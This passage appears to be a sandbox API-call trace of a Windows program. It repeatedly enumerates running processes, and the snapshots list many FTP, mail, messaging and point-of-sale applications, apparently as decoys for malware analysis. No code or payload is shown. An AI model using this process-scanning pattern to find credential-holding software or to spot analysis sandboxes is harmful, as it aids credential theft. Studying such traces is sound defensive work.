th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.232] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0220.235] CloseHandle (hObject=0x1018) returned 1 [0220.235] Sleep (dwMilliseconds=0x64) [0220.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0220.495] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.499] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.501] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.502] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.503] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.506] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.508] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.509] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.514] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.516] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.517] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.519] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.520] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.522] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.523] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.524] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.576] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.617] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.619] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.621] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0220.622] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0220.624] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.625] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.627] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0220.628] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0220.630] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0220.631] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0220.632] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.634] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0220.635] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.637] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.638] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.640] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0220.641] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0220.643] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0220.644] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0220.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0220.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0220.648] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0220.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0220.690] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0220.764] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0220.766] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0220.767] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0220.769] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0220.770] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0220.772] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0220.773] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0220.775] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0220.777] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0220.778] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0220.780] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0220.781] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0220.782] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0220.784] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0220.786] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0220.787] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0220.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0220.791] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0220.793] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0220.795] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0220.796] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0220.798] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0220.800] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0220.810] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0220.812] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0220.814] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0220.816] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0220.818] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0220.820] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0220.821] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0220.824] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0220.828] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0220.830] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0220.832] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0220.833] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0220.835] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0220.837] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0220.839] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0220.843] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0220.845] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, 